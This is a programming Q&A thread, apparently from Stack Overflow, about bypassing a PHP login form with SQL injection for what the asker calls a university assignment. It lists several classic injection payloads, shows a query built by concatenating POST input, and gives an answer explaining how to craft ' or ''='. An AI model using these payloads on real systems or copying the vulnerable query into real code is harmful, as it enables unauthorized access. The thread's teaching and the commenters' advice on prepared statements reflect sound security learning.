# SQL injection for username

Tags: php, sql-injection

I have a php code that I need to login without knowing the username or the password using SQL injection...I have tried so many of the examples on the internet and it doesnt seem to work. for e.g.

```
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
```

...
and many more!

This is the php code:

```
$query="SELECT user_name,password,display_name from members where user_name='".$_POST['user_name']."';";

$result=mysqli_query($Connect,$query);
$row=mysqli_fetch_assoc($result);
$user_pass = md5($_POST['pass_word']);
$user_name = $row['user_name'];
$display_name = $row['display_name'];

if(strcmp($user_pass,$row['password'])!=0)
{
    echo "Login failed for user ".$_POST['user_name'];
}
else
{
    # Start the session
    session_start();
    $_SESSION['USER_NAME'] = $user_name;
    $_SESSION['DISP_NAME'] = $display_name;
    echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" ></head>";
}
```

Can someone explain to me what sql injection I can use to login?

Thank you

Comment: You aren't logging the users in based on the return of the query. You compare the DB password to the inputted password so SQL injection isn't enough. Not to say your DB is safe though. Use prepared statements.

Comment: Are you asking us to help you use SQL Injection against a website? Because, in some jurisdictions, that's illegal...

Comment: @MikeMcCaughan my friend this is some university assignement

Answer (score -1):

Ignore the PHP. Focus on the SQL:

```
... WHERE username='$value'
```

You have to subvert that into something like

```
... WHERE username = '$value' OR truevalue
```

But you have that pesky `'` after `$value` in there, getting in the way, so

```
... WHERE username = '$value' OR ''=''
                     ^---------------^--- original quotes
                      ^^^^^^^^^^^^^^^---injected value
```

so

```
$_POST['username'] = "' or ''='"
```

But note that this won't allow a login anyways, as you still compare the passwords in a non-injectionable fashion. This will just act to retrieve **ALL** of the user entries in the database, instead of just the one single user account.

Comment: Thank you for your explanation . I feel like Im closer now, because Im actually getting an SQL error as result:
Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in C:\.... line 21

Comment: It's also a good idea to escape your username before using it like this: mysql_real_escape_string($_POST['username']). It's still best to use prepared statements though.

Comment: @GrumpyToaster: you realize that OP's asking **HOW** to inject, not how to prevent it?